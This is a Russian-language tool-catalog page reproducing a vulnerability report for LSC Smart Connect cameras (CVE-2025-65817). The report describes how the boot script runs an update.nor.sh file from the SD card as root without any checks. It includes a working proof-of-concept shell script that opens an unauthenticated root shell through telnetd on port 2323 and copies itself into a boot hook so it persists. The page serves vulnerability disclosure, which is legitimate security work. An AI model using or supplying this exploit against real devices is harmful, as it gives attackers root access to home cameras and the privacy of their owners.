Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-65817 — Вот CVE-2025-65817 | Kitploit
Инструменты/GitHubGitHub/istaarkk/cve-2025-65817
Безопасность встроенных системБезопасность IoTАнализ уязвимостейЭксплуатацияБезопасность оборудования и IoTИнструмент Удаленного Доступа
GitHubistaarkk/cve-2025-65817

CVE-2025-65817

Вот CVE-2025-65817

Репозиторий
98 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-65817


FieldsValue
НазваниеОтчет об уязвимости: камера LSC Smart Connect
Дата2024-02-15
ОписаниеИспользование хука обновления SD-карты для запуска удаленных оболочек на камерах LSC Smart Connect.
Тегиiot, уязвимость, cve
Прошивка1.14.13

Отчет об уязвимости камеры LSC Smart Connect

Обнаруженная уязвимость заключается в эксплуатации системы обновления в start_app.sh, а точнее — через монтирование SD-карты и файл update.nor.sh.

Переменные конфигурации

root@kitploit:~
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"

Раздел local/sbin/start_app.sh:50–99 слепо доверяет любому файлу с именем update.nor.sh, расположенному на SD-карте. Во время загрузки скрипт:

  • монтирует SD-карту,
  • копирует update.nor.sh в /tmp/update.nor.sh,
  • не выполняет никакой проверки его содержимого, целостности, прав доступа или владельца.

Позже в последовательности запуска (local/sbin/start_app.sh:108–129) скопированный файл:

  • помечается как исполняемый,
  • запускается от имени root,
  • выполняется с передачей точки монтирования SD-карты в качестве аргумента.

Это выполнение происходит до запуска основного ipc_service, то есть скрипт работает в среде с максимальными привилегиями, где уже доступны сетевые утилиты, функции сторожевого таймера и вспомогательные средства обновления.

Доступные утилиты

Эксплойт заключается в создании оболочки и открытии порта через telnetd, который присутствует на камере:

root@kitploit:~
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]

Доказательство концепции

Нам нужно лишь записать .sh-скрипт на SD-карту и назвать его update.nor.sh.

Выбранный мной эксплойт:

root@kitploit:~
#!/bin/sh

telnetd -l /bin/sh -p 2323 &

echo "Telnet start by update.nor.sh" > /tmp/exploit_success

cp /mnt/update.nor.sh /mnt/config/hook-boot.sh

date > /tmp/exploit_time

Подтверждаем, что порт открыт.

alt text

Подключаемся через telnet:

alt text

Скачать инструмент